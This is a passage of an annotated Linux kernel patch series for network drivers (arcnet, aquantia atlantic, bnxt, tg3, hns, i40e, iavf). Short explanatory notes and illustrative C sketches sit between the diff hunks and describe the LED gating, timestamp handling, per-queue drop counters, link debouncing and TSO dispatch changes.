++		ret = com20020_found(dev, IRQF_SHARED);
++		if (ret)
++			goto err_free_arcdev;
++
+ 		card = devm_kzalloc(&pdev->dev, sizeof(struct com20020_dev),
+ 				    GFP_KERNEL);
+ 		if (!card) {
+@@ -239,41 +244,39 @@ static int com20020pci_probe(struct pci_dev *pdev,
+ 
+ 		card->index = i;
+ 		card->pci_priv = priv;
+-		card->tx_led.brightness_set = led_tx_set;
+-		card->tx_led.default_trigger = devm_kasprintf(&pdev->dev,
+-						GFP_KERNEL, "arc%d-%d-tx",
+-						dev->dev_id, i);
+-		card->tx_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
+-						"pci:green:tx:%d-%d",
+-						dev->dev_id, i);
+-
+-		card->tx_led.dev = &dev->dev;
+-		card->recon_led.brightness_set = led_recon_set;
+-		card->recon_led.default_trigger = devm_kasprintf(&pdev->dev,
+-						GFP_KERNEL, "arc%d-%d-recon",
+-						dev->dev_id, i);
+-		card->recon_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
+-						"pci:red:recon:%d-%d",
+-						dev->dev_id, i);
+-		card->recon_led.dev = &dev->dev;
+-		card->dev = dev;
+-
+-		ret = devm_led_classdev_register(&pdev->dev, &card->tx_led);
+-		if (ret)
+-			goto err_free_arcdev;
+ 
+-		ret = devm_led_classdev_register(&pdev->dev, &card->recon_led);
+-		if (ret)
+-			goto err_free_arcdev;
+-
+-		dev_set_drvdata(&dev->dev, card);
+-
+-		ret = com20020_found(dev, IRQF_SHARED);
+-		if (ret)
+-			goto err_free_arcdev;
+-
+-		devm_arcnet_led_init(dev, dev->dev_id, i);
++		if (ci->flags & ARC_HAS_LED) {
++			card->tx_led.brightness_set = led_tx_set;
++			card->tx_led.default_trigger = devm_kasprintf(&pdev->dev,
++							GFP_KERNEL, "arc%d-%d-tx",
++							dev->dev_id, i);
++			card->tx_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
++							"pci:green:tx:%d-%d",
++							dev->dev_id, i);
++
++			card->tx_led.dev = &dev->dev;
++			card->recon_led.brightness_set = led_recon_set;
++			card->recon_led.default_trigger = devm_kasprintf(&pdev->dev,
++							GFP_KERNEL, "arc%d-%d-recon",
++							dev->dev_id, i);
++			card->recon_led.name = devm_kasprintf(&pdev->dev, GFP_KERNEL,
++							"pci:red:recon:%d-%d",
++							dev->dev_id, i);
++			card->recon_led.dev = &dev->dev;
++
++			ret = devm_led_classdev_register(&pdev->dev, &card->tx_led);
++			if (ret)
++				goto err_free_arcdev;
++
++			ret = devm_led_classdev_register(&pdev->dev, &card->recon_led);
++			if (ret)
++				goto err_free_arcdev;
++
++			dev_set_drvdata(&dev->dev, card);
++			devm_arcnet_led_init(dev, dev->dev_id, i);
++		}
+ 
++		card->dev = dev;
+ 		list_add(&card->list, &priv->list_dev);
+ 		continue;
+ 
+@@ -329,7 +332,7 @@ static struct com20020_pci_card_info card_info_5mbit = {
+ };
+ 
+ static struct com20020_pci_card_info card_info_sohard = {
+-	.name = "PLX-PCI",
++	.name = "SOHARD SH ARC-PCI",
+ 	.devcount = 1,
+ 	/* SOHARD needs PCI base addr 4 */
+ 	.chan_map_tbl = {
+@@ -364,7 +367,7 @@ static struct com20020_pci_card_info card_info_eae_arc1 = {
+ 		},
+ 	},
+ 	.rotary = 0x0,
+-	.flags = ARC_CAN_10MBIT,
++	.flags = ARC_HAS_ROTARY | ARC_HAS_LED | ARC_CAN_10MBIT,
+ };
+ 
+ static struct com20020_pci_card_info card_info_eae_ma1 = {
+@@ -396,7 +399,7 @@ static struct com20020_pci_card_info card_info_eae_ma1 = {
+ 		},
+ 	},
+ 	.rotary = 0x0,
+-	.flags = ARC_CAN_10MBIT,
++	.flags = ARC_HAS_ROTARY | ARC_HAS_LED | ARC_CAN_10MBIT,
+ };
+ 
+ static struct com20020_pci_card_info card_info_eae_fb2 = {
+@@ -421,7 +424,7 @@ static struct com20020_pci_card_info card_info_eae_fb2 = {
+ 		},
+ 	},
+ 	.rotary = 0x0,
+-	.flags = ARC_CAN_10MBIT,
++	.flags = ARC_HAS_ROTARY | ARC_HAS_LED | ARC_CAN_10MBIT,
+ };
+ 
+ static const struct pci_device_id com20020pci_id_table[] = {
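
The arcnet changes introduce per-board capability flags (ARC_HAS_ROTARY,
ARC_HAS_LED) so the rotary-coder read and LED registration only run on EAE
boards that actually have the hardware; SOHARD cards get neither, and
com20020_found() now runs before the LED setup. A compact sketch of the flag
gating (probe() is an illustrative stand-in):

#include <stdio.h>

#define ARC_HAS_LED	4	/* card has software controlled LEDs */
#define ARC_HAS_ROTARY	8	/* card has rotary encoder */

struct card_info {
	const char *name;
	unsigned int flags;
};

static void probe(const struct card_info *ci)
{
	if (ci->flags & ARC_HAS_ROTARY)
		printf("%s: read dev_id from rotary coder\n", ci->name);
	if (ci->flags & ARC_HAS_LED)
		printf("%s: register tx/recon LEDs\n", ci->name);
}

int main(void)
{
	struct card_info eae = {
		"EAE PLX-PCI MA1", ARC_HAS_ROTARY | ARC_HAS_LED
	};
	struct card_info sohard = { "SOHARD SH ARC-PCI", 0 };

	probe(&eae);
	probe(&sohard);		/* prints nothing: no rotary, no LEDs */
	return 0;
}
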
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+index 80b44043e6c53..28c9b6f1a54f1 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.c
+@@ -553,17 +553,17 @@ void aq_ptp_tx_hwtstamp(struct aq_nic_s *aq_nic, u64 timestamp)
+ 
+ /* aq_ptp_rx_hwtstamp - utility function which checks for RX time stamp
+  * @adapter: pointer to adapter struct
+- * @skb: particular skb to send timestamp with
++ * @shhwtstamps: particular skb_shared_hwtstamps to save timestamp
+  *
+  * if the timestamp is valid, we convert it into the timecounter ns
+  * value, then store that result into the hwtstamps structure which
+  * is passed up the network stack
+  */
+-static void aq_ptp_rx_hwtstamp(struct aq_ptp_s *aq_ptp, struct sk_buff *skb,
++static void aq_ptp_rx_hwtstamp(struct aq_ptp_s *aq_ptp, struct skb_shared_hwtstamps *shhwtstamps,
+ 			       u64 timestamp)
+ {
+ 	timestamp -= atomic_read(&aq_ptp->offset_ingress);
+-	aq_ptp_convert_to_hwtstamp(aq_ptp, skb_hwtstamps(skb), timestamp);
++	aq_ptp_convert_to_hwtstamp(aq_ptp, shhwtstamps, timestamp);
+ }
+ 
+ void aq_ptp_hwtstamp_config_get(struct aq_ptp_s *aq_ptp,
+@@ -639,7 +639,7 @@ bool aq_ptp_ring(struct aq_nic_s *aq_nic, struct aq_ring_s *ring)
+ 	       &aq_ptp->ptp_rx == ring || &aq_ptp->hwts_rx == ring;
+ }
+ 
+-u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct sk_buff *skb, u8 *p,
++u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct skb_shared_hwtstamps *shhwtstamps, u8 *p,
+ 		      unsigned int len)
+ {
+ 	struct aq_ptp_s *aq_ptp = aq_nic->aq_ptp;
+@@ -648,7 +648,7 @@ u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct sk_buff *skb, u8 *p,
+ 						   p, len, &timestamp);
+ 
+ 	if (ret > 0)
+-		aq_ptp_rx_hwtstamp(aq_ptp, skb, timestamp);
++		aq_ptp_rx_hwtstamp(aq_ptp, shhwtstamps, timestamp);
+ 
+ 	return ret;
+ }
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h
+index 28ccb7ca2df9e..210b723f22072 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ptp.h
+@@ -67,7 +67,7 @@ int aq_ptp_hwtstamp_config_set(struct aq_ptp_s *aq_ptp,
+ /* Return either ring is belong to PTP or not*/
+ bool aq_ptp_ring(struct aq_nic_s *aq_nic, struct aq_ring_s *ring);
+ 
+-u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct sk_buff *skb, u8 *p,
++u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic, struct skb_shared_hwtstamps *shhwtstamps, u8 *p,
+ 		      unsigned int len);
+ 
+ struct ptp_clock *aq_ptp_get_ptp_clock(struct aq_ptp_s *aq_ptp);
+@@ -143,7 +143,7 @@ static inline bool aq_ptp_ring(struct aq_nic_s *aq_nic, struct aq_ring_s *ring)
+ }
+ 
+ static inline u16 aq_ptp_extract_ts(struct aq_nic_s *aq_nic,
+-				    struct sk_buff *skb, u8 *p,
++				    struct skb_shared_hwtstamps *shhwtstamps, u8 *p,
+ 				    unsigned int len)
+ {
+ 	return 0;
+diff --git a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+index 2dc8d215a5918..b5a49166fa972 100644
+--- a/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
++++ b/drivers/net/ethernet/aquantia/atlantic/aq_ring.c
+@@ -647,7 +647,7 @@ static int __aq_ring_rx_clean(struct aq_ring_s *self, struct napi_struct *napi,
+ 		}
+ 		if (is_ptp_ring)
+ 			buff->len -=
+-				aq_ptp_extract_ts(self->aq_nic, skb,
++				aq_ptp_extract_ts(self->aq_nic, skb_hwtstamps(skb),
+ 						  aq_buf_vaddr(&buff->rxdata),
+ 						  buff->len);
+ 
+@@ -742,6 +742,8 @@ static int __aq_ring_xdp_clean(struct aq_ring_s *rx_ring,
+ 		struct aq_ring_buff_s *buff = &rx_ring->buff_ring[rx_ring->sw_head];
+ 		bool is_ptp_ring = aq_ptp_ring(rx_ring->aq_nic, rx_ring);
+ 		struct aq_ring_buff_s *buff_ = NULL;
++		u16 ptp_hwtstamp_len = 0;
++		struct skb_shared_hwtstamps shhwtstamps;
+ 		struct sk_buff *skb = NULL;
+ 		unsigned int next_ = 0U;
+ 		struct xdp_buff xdp;
+@@ -810,11 +812,12 @@ static int __aq_ring_xdp_clean(struct aq_ring_s *rx_ring,
+ 		hard_start = page_address(buff->rxdata.page) +
+ 			     buff->rxdata.pg_off - rx_ring->page_offset;
+ 
+-		if (is_ptp_ring)
+-			buff->len -=
+-				aq_ptp_extract_ts(rx_ring->aq_nic, skb,
+-						  aq_buf_vaddr(&buff->rxdata),
+-						  buff->len);
++		if (is_ptp_ring) {
++			ptp_hwtstamp_len = aq_ptp_extract_ts(rx_ring->aq_nic, &shhwtstamps,
++							     aq_buf_vaddr(&buff->rxdata),
++							     buff->len);
++			buff->len -= ptp_hwtstamp_len;
++		}
+ 
+ 		xdp_init_buff(&xdp, frame_sz, &rx_ring->xdp_rxq);
+ 		xdp_prepare_buff(&xdp, hard_start, rx_ring->page_offset,
+@@ -834,6 +837,9 @@ static int __aq_ring_xdp_clean(struct aq_ring_s *rx_ring,
+ 		if (IS_ERR(skb) || !skb)
+ 			continue;
+ 
++		if (ptp_hwtstamp_len > 0)
++			*skb_hwtstamps(skb) = shhwtstamps;
++
+ 		if (buff->is_vlan)
+ 			__vlan_hwaccel_put_tag(skb, htons(ETH_P_8021Q),
+ 					       buff->vlan_rx_tag);
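
In the XDP receive path above, the hardware timestamp has to be pulled out of the buffer before any sk_buff exists, so the fix parks it in a stack-local struct skb_shared_hwtstamps and copies it into skb_hwtstamps() only once the skb has been built. A minimal userspace sketch of this capture-now-attach-later pattern (all types and names below are illustrative stand-ins, not the driver's API):

    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    struct hwtstamp { uint64_t ns; };        /* stand-in for skb_shared_hwtstamps */
    struct packet   { struct hwtstamp ts; }; /* stand-in for sk_buff */

    /* Parse the trailer; returns bytes consumed, fills *ts on success. */
    static unsigned extract_ts(const uint8_t *p, unsigned len, struct hwtstamp *ts)
    {
        if (len < 8)
            return 0;
        memcpy(&ts->ns, p + len - 8, 8);     /* timestamp trails the payload */
        return 8;
    }

    int main(void)
    {
        uint8_t buf[72] = { 0 };
        unsigned len = sizeof(buf);
        struct hwtstamp ts;
        unsigned ts_len = extract_ts(buf, len, &ts); /* before any packet exists */

        len -= ts_len;                       /* shrink the payload first ...   */
        struct packet pkt = { 0 };           /* ... build the packet later     */
        if (ts_len)
            pkt.ts = ts;                     /* attach the saved timestamp     */
        printf("payload=%u ts=%llu\n", len, (unsigned long long)pkt.ts.ns);
        return 0;
    }
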
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c
+index d8afcf8d6b30e..4d6663ff84722 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_tc.c
+@@ -2075,6 +2075,7 @@ destroy_flow_table:
+ 	rhashtable_destroy(&tc_info->flow_table);
+ free_tc_info:
+ 	kfree(tc_info);
++	bp->tc_info = NULL;
+ 	return rc;
+ }
+ 
+diff --git a/drivers/net/ethernet/broadcom/tg3.c b/drivers/net/ethernet/broadcom/tg3.c
+index 85570e40c8e9b..f60a16de565ed 100644
+--- a/drivers/net/ethernet/broadcom/tg3.c
++++ b/drivers/net/ethernet/broadcom/tg3.c
+@@ -6853,7 +6853,7 @@ static int tg3_rx(struct tg3_napi *tnapi, int budget)
+ 				       desc_idx, *post_ptr);
+ 		drop_it_no_recycle:
+ 			/* Other statistics kept track of by card. */
+-			tp->rx_dropped++;
++			tnapi->rx_dropped++;
+ 			goto next_pkt;
+ 		}
+ 
+@@ -7879,8 +7879,10 @@ static int tg3_tso_bug(struct tg3 *tp, struct tg3_napi *tnapi,
+ 
+ 	segs = skb_gso_segment(skb, tp->dev->features &
+ 				    ~(NETIF_F_TSO | NETIF_F_TSO6));
+-	if (IS_ERR(segs) || !segs)
++	if (IS_ERR(segs) || !segs) {
++		tnapi->tx_dropped++;
+ 		goto tg3_tso_bug_end;
++	}
+ 
+ 	skb_list_walk_safe(segs, seg, next) {
+ 		skb_mark_not_on_list(seg);
+@@ -8151,7 +8153,7 @@ dma_error:
+ drop:
+ 	dev_kfree_skb_any(skb);
+ drop_nofree:
+-	tp->tx_dropped++;
++	tnapi->tx_dropped++;
+ 	return NETDEV_TX_OK;
+ }
+ 
+@@ -9330,7 +9332,7 @@ static void __tg3_set_rx_mode(struct net_device *);
+ /* tp->lock is held. */
+ static int tg3_halt(struct tg3 *tp, int kind, bool silent)
+ {
+-	int err;
++	int err, i;
+ 
+ 	tg3_stop_fw(tp);
+ 
+@@ -9351,6 +9353,13 @@ static int tg3_halt(struct tg3 *tp, int kind, bool silent)
+ 
+ 		/* And make sure the next sample is new data */
+ 		memset(tp->hw_stats, 0, sizeof(struct tg3_hw_stats));
++
++		for (i = 0; i < TG3_IRQ_MAX_VECS; ++i) {
++			struct tg3_napi *tnapi = &tp->napi[i];
++
++			tnapi->rx_dropped = 0;
++			tnapi->tx_dropped = 0;
++		}
+ 	}
+ 
+ 	return err;
+@@ -11900,6 +11909,9 @@ static void tg3_get_nstats(struct tg3 *tp, struct rtnl_link_stats64 *stats)
+ {
+ 	struct rtnl_link_stats64 *old_stats = &tp->net_stats_prev;
+ 	struct tg3_hw_stats *hw_stats = tp->hw_stats;
++	unsigned long rx_dropped;
++	unsigned long tx_dropped;
++	int i;
+ 
+ 	stats->rx_packets = old_stats->rx_packets +
+ 		get_stat64(&hw_stats->rx_ucast_packets) +
+@@ -11946,8 +11958,26 @@ static void tg3_get_nstats(struct tg3 *tp, struct rtnl_link_stats64 *stats)
+ 	stats->rx_missed_errors = old_stats->rx_missed_errors +
+ 		get_stat64(&hw_stats->rx_discards);
+ 
+-	stats->rx_dropped = tp->rx_dropped;
+-	stats->tx_dropped = tp->tx_dropped;
++	/* Aggregate per-queue counters. The per-queue counters are updated
++	 * by a single writer, race-free. The result computed by this loop
++	 * might not be 100% accurate (counters can be updated in the middle of
++	 * the loop) but the next tg3_get_nstats() will recompute the current
++	 * value so it is acceptable.
++	 *
++	 * Note that these counters wrap around at 4G on 32bit machines.
++	 */
++	rx_dropped = (unsigned long)(old_stats->rx_dropped);
++	tx_dropped = (unsigned long)(old_stats->tx_dropped);
++
++	for (i = 0; i < tp->irq_cnt; i++) {
++		struct tg3_napi *tnapi = &tp->napi[i];
++
++		rx_dropped += tnapi->rx_dropped;
++		tx_dropped += tnapi->tx_dropped;
++	}
++
++	stats->rx_dropped = rx_dropped;
++	stats->tx_dropped = tx_dropped;
+ }
+ 
+ static int tg3_get_regs_len(struct net_device *dev)
+diff --git a/drivers/net/ethernet/broadcom/tg3.h b/drivers/net/ethernet/broadcom/tg3.h
+index 1000c894064f0..8d753f8c5b065 100644
+--- a/drivers/net/ethernet/broadcom/tg3.h
++++ b/drivers/net/ethernet/broadcom/tg3.h
+@@ -3018,6 +3018,7 @@ struct tg3_napi {
+ 	u16				*rx_rcb_prod_idx;
+ 	struct tg3_rx_prodring_set	prodring;
+ 	struct tg3_rx_buffer_desc	*rx_rcb;
++	unsigned long			rx_dropped;
+ 
+ 	u32				tx_prod	____cacheline_aligned;
+ 	u32				tx_cons;
+@@ -3026,6 +3027,7 @@ struct tg3_napi {
+ 	u32				prodmbox;
+ 	struct tg3_tx_buffer_desc	*tx_ring;
+ 	struct tg3_tx_ring_info		*tx_buffers;
++	unsigned long			tx_dropped;
+ 
+ 	dma_addr_t			status_mapping;
+ 	dma_addr_t			rx_rcb_mapping;
+@@ -3219,8 +3221,6 @@ struct tg3 {
+ 
+ 
+ 	/* begin "everything else" cacheline(s) section */
+-	unsigned long			rx_dropped;
+-	unsigned long			tx_dropped;
+ 	struct rtnl_link_stats64	net_stats_prev;
+ 	struct tg3_ethtool_stats	estats_prev;
+ 
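
Moving rx_dropped/tx_dropped from the shared struct tg3 into struct tg3_napi gives each ring a single-writer counter; totals are only summed when statistics are read, tolerating a momentarily stale sum as the comment in tg3_get_nstats() explains. A rough standalone sketch of that read-time aggregation (illustrative types only):

    #include <stdio.h>

    #define NQ 4

    struct queue { unsigned long rx_dropped, tx_dropped; }; /* one writer each */

    static void get_stats(const struct queue *q, int n,
                          unsigned long *rx, unsigned long *tx)
    {
        unsigned long r = 0, t = 0;
        /* Summed at read time; a reader may see a value mid-update, which
         * is acceptable because the next read recomputes the total. */
        for (int i = 0; i < n; i++) {
            r += q[i].rx_dropped;
            t += q[i].tx_dropped;
        }
        *rx = r;
        *tx = t;
    }

    int main(void)
    {
        struct queue q[NQ] = { { 3, 1 }, { 0, 2 }, { 5, 0 }, { 1, 1 } };
        unsigned long rx, tx;
        get_stats(q, NQ, &rx, &tx);
        printf("rx_dropped=%lu tx_dropped=%lu\n", rx, tx); /* 9 and 4 */
        return 0;
    }
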
+diff --git a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c
+index 928d934cb21a5..f75668c479351 100644
+--- a/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c
++++ b/drivers/net/ethernet/hisilicon/hns/hns_dsaf_mac.c
+@@ -66,6 +66,27 @@ static enum mac_mode hns_get_enet_interface(const struct hns_mac_cb *mac_cb)
+ 	}
+ }
+ 
++static u32 hns_mac_link_anti_shake(struct mac_driver *mac_ctrl_drv)
++{
++#define HNS_MAC_LINK_WAIT_TIME 5
++#define HNS_MAC_LINK_WAIT_CNT 40
++
++	u32 link_status = 0;
++	int i;
++
++	if (!mac_ctrl_drv->get_link_status)
++		return link_status;
++
++	for (i = 0; i < HNS_MAC_LINK_WAIT_CNT; i++) {
++		msleep(HNS_MAC_LINK_WAIT_TIME);
++		mac_ctrl_drv->get_link_status(mac_ctrl_drv, &link_status);
++		if (!link_status)
++			break;
++	}
++
++	return link_status;
++}
++
+ void hns_mac_get_link_status(struct hns_mac_cb *mac_cb, u32 *link_status)
+ {
+ 	struct mac_driver *mac_ctrl_drv;
+@@ -83,6 +104,14 @@ void hns_mac_get_link_status(struct hns_mac_cb *mac_cb, u32 *link_status)
+ 							       &sfp_prsnt);
+ 		if (!ret)
+ 			*link_status = *link_status && sfp_prsnt;
++
++		/* For a FIBER port, there may be a fake link up.
++		 * When the link status changes from down to up, we need to do
++		 * anti-shake. The anti-shake time is based on tests.
++		 * Only FIBER ports need to do this.
++		 */
++		if (*link_status && !mac_cb->link)
++			*link_status = hns_mac_link_anti_shake(mac_ctrl_drv);
+ 	}
+ 
+ 	mac_cb->link = *link_status;
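
The anti-shake helper above debounces a link-up report by re-reading the status up to 40 times at 5 ms intervals and giving up the moment it reads "down". The same debounce shape, reduced to a standalone sketch (the status probe and sleep are mocked, not the driver's callbacks):

    #include <stdio.h>

    #define WAIT_MS  5
    #define WAIT_CNT 40

    static int fake_read_link(void)   /* hypothetical status probe */
    {
        static int calls;
        return ++calls < 3;           /* reports up briefly, then drops */
    }

    static void sleep_ms(int ms) { (void)ms; /* msleep() stand-in */ }

    /* Returns 1 only if the link stayed up for the whole window. */
    static int link_debounced(void)
    {
        int up = 0;
        for (int i = 0; i < WAIT_CNT; i++) {
            sleep_ms(WAIT_MS);
            up = fake_read_link();
            if (!up)                  /* any 'down' sample cancels the event */
                break;
        }
        return up;
    }

    int main(void)
    {
        printf("link up: %d\n", link_debounced()); /* 0: fake up filtered */
        return 0;
    }
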
+diff --git a/drivers/net/ethernet/hisilicon/hns/hns_enet.c b/drivers/net/ethernet/hisilicon/hns/hns_enet.c
+index 7cf10d1e2b311..85722afe21770 100644
+--- a/drivers/net/ethernet/hisilicon/hns/hns_enet.c
++++ b/drivers/net/ethernet/hisilicon/hns/hns_enet.c
+@@ -142,7 +142,8 @@ MODULE_DEVICE_TABLE(acpi, hns_enet_acpi_match);
+ 
+ static void fill_desc(struct hnae_ring *ring, void *priv,
+ 		      int size, dma_addr_t dma, int frag_end,
+-		      int buf_num, enum hns_desc_type type, int mtu)
++		      int buf_num, enum hns_desc_type type, int mtu,
++		      bool is_gso)
+ {
+ 	struct hnae_desc *desc = &ring->desc[ring->next_to_use];
+ 	struct hnae_desc_cb *desc_cb = &ring->desc_cb[ring->next_to_use];
+@@ -275,6 +276,15 @@ static int hns_nic_maybe_stop_tso(
+ 	return 0;
+ }
+ 
++static int hns_nic_maybe_stop_tx_v2(struct sk_buff **out_skb, int *bnum,
++				    struct hnae_ring *ring)
++{
++	if (skb_is_gso(*out_skb))
++		return hns_nic_maybe_stop_tso(out_skb, bnum, ring);
++	else
++		return hns_nic_maybe_stop_tx(out_skb, bnum, ring);
++}
++
+ static void fill_tso_desc(struct hnae_ring *ring, void *priv,
+ 			  int size, dma_addr_t dma, int frag_end,
+ 			  int buf_num, enum hns_desc_type type, int mtu)
+@@ -300,6 +310,19 @@ static void fill_tso_desc(struct hnae_ring *ring, void *priv,
+ 				mtu);
+ }
+ 
++static void fill_desc_v2(struct hnae_ring *ring, void *priv,
++			 int size, dma_addr_t dma, int frag_end,
++			 int buf_num, enum hns_desc_type type, int mtu,
++			 bool is_gso)
++{
++	if (is_gso)
++		fill_tso_desc(ring, priv, size, dma, frag_end, buf_num, type,
++			      mtu);
++	else
++		fill_v2_desc(ring, priv, size, dma, frag_end, buf_num, type,
++			     mtu);
++}
++
+ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 				struct sk_buff *skb,
+ 				struct hns_nic_ring_data *ring_data)
+@@ -313,6 +336,7 @@ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 	int seg_num;
+ 	dma_addr_t dma;
+ 	int size, next_to_use;
++	bool is_gso;
+ 	int i;
+ 
+ 	switch (priv->ops.maybe_stop_tx(&skb, &buf_num, ring)) {
+@@ -339,8 +363,9 @@ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 		ring->stats.sw_err_cnt++;
+ 		goto out_err_tx_ok;
+ 	}
++	is_gso = skb_is_gso(skb);
+ 	priv->ops.fill_desc(ring, skb, size, dma, seg_num == 1 ? 1 : 0,
+-			    buf_num, DESC_TYPE_SKB, ndev->mtu);
++			    buf_num, DESC_TYPE_SKB, ndev->mtu, is_gso);
+ 
+ 	/* fill the fragments */
+ 	for (i = 1; i < seg_num; i++) {
+@@ -354,7 +379,7 @@ netdev_tx_t hns_nic_net_xmit_hw(struct net_device *ndev,
+ 		}
+ 		priv->ops.fill_desc(ring, skb_frag_page(frag), size, dma,
+ 				    seg_num - 1 == i ? 1 : 0, buf_num,
+-				    DESC_TYPE_PAGE, ndev->mtu);
++				    DESC_TYPE_PAGE, ndev->mtu, is_gso);
+ 	}
+ 
+ 	/*complete translate all packets*/
+@@ -1776,15 +1801,6 @@ static int hns_nic_set_features(struct net_device *netdev,
+ 			netdev_info(netdev, "enet v1 do not support tso!\n");
+ 		break;
+ 	default:
+-		if (features & (NETIF_F_TSO | NETIF_F_TSO6)) {
+-			priv->ops.fill_desc = fill_tso_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tso;
+-			/* The chip only support 7*4096 */
+-			netif_set_tso_max_size(netdev, 7 * 4096);
+-		} else {
+-			priv->ops.fill_desc = fill_v2_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx;
+-		}
+ 		break;
+ 	}
+ 	netdev->features = features;
+@@ -2159,16 +2175,9 @@ static void hns_nic_set_priv_ops(struct net_device *netdev)
+ 		priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx;
+ 	} else {
+ 		priv->ops.get_rxd_bnum = get_v2rx_desc_bnum;
+-		if ((netdev->features & NETIF_F_TSO) ||
+-		    (netdev->features & NETIF_F_TSO6)) {
+-			priv->ops.fill_desc = fill_tso_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tso;
+-			/* This chip only support 7*4096 */
+-			netif_set_tso_max_size(netdev, 7 * 4096);
+-		} else {
+-			priv->ops.fill_desc = fill_v2_desc;
+-			priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx;
+-		}
++		priv->ops.fill_desc = fill_desc_v2;
++		priv->ops.maybe_stop_tx = hns_nic_maybe_stop_tx_v2;
++		netif_set_tso_max_size(netdev, 7 * 4096);
+ 		/* enable tso when init
+ 		 * control tso on/off through TSE bit in bd
+ 		 */
+diff --git a/drivers/net/ethernet/hisilicon/hns/hns_enet.h b/drivers/net/ethernet/hisilicon/hns/hns_enet.h
+index ffa9d6573f54b..3f3ee032f631c 100644
+--- a/drivers/net/ethernet/hisilicon/hns/hns_enet.h
++++ b/drivers/net/ethernet/hisilicon/hns/hns_enet.h
+@@ -44,7 +44,8 @@ struct hns_nic_ring_data {
+ struct hns_nic_ops {
+ 	void (*fill_desc)(struct hnae_ring *ring, void *priv,
+ 			  int size, dma_addr_t dma, int frag_end,
+-			  int buf_num, enum hns_desc_type type, int mtu);
++			  int buf_num, enum hns_desc_type type, int mtu,
++			  bool is_gso);
+ 	int (*maybe_stop_tx)(struct sk_buff **out_skb,
+ 			     int *bnum, struct hnae_ring *ring);
+ 	void (*get_rxd_bnum)(u32 bnum_flag, int *out_bnum);
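
Instead of swapping the fill_desc/maybe_stop_tx function pointers every time the TSO feature is toggled (which could race against in-flight transmits), the v2 wrappers above decide per packet with skb_is_gso(). A minimal sketch of that dispatch style, with invented stand-ins for the two descriptor fillers:

    #include <stdbool.h>
    #include <stdio.h>

    static void fill_plain(int len) { printf("plain desc, len=%d\n", len); }
    static void fill_tso(int len)   { printf("tso desc,   len=%d\n", len); }

    /* One stable entry point; the branch happens per packet, so toggling
     * the TSO feature bit never has to swap function pointers at runtime. */
    static void fill_desc_v2(int len, bool is_gso)
    {
        if (is_gso)
            fill_tso(len);
        else
            fill_plain(len);
    }

    int main(void)
    {
        fill_desc_v2(1500, false);
        fill_desc_v2(64000, true);
        return 0;
    }
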
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_main.c b/drivers/net/ethernet/intel/i40e/i40e_main.c
+index 9f5824eb8808a..b4157ff370a31 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_main.c
++++ b/drivers/net/ethernet/intel/i40e/i40e_main.c
+@@ -16158,7 +16158,7 @@ static int i40e_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	       I40E_PRTGL_SAH_MFS_MASK) >> I40E_PRTGL_SAH_MFS_SHIFT;
+ 	if (val < MAX_FRAME_SIZE_DEFAULT)
+ 		dev_warn(&pdev->dev, "MFS for port %x has been set below the default: %x\n",
+-			 i, val);
++			 pf->hw.port, val);
+ 
+ 	/* Add a filter to drop all Flow control frames from any VSI from being
+ 	 * transmitted. By doing so we stop a malicious VF from sending out
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+index c13b4fa659ee9..31e02624aca48 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_ethtool.c
+@@ -829,18 +829,10 @@ static int __iavf_set_coalesce(struct net_device *netdev,
+ 	struct iavf_adapter *adapter = netdev_priv(netdev);
+ 	int i;
+ 
+-	if (ec->rx_coalesce_usecs == 0) {
+-		if (ec->use_adaptive_rx_coalesce)
+-			netif_info(adapter, drv, netdev, "rx-usecs=0, need to disable adaptive-rx for a complete disable\n");
+-	} else if ((ec->rx_coalesce_usecs < IAVF_MIN_ITR) ||
+-		   (ec->rx_coalesce_usecs > IAVF_MAX_ITR)) {
++	if (ec->rx_coalesce_usecs > IAVF_MAX_ITR) {
+ 		netif_info(adapter, drv, netdev, "Invalid value, rx-usecs range is 0-8160\n");
+ 		return -EINVAL;
+-	} else if (ec->tx_coalesce_usecs == 0) {
+-		if (ec->use_adaptive_tx_coalesce)
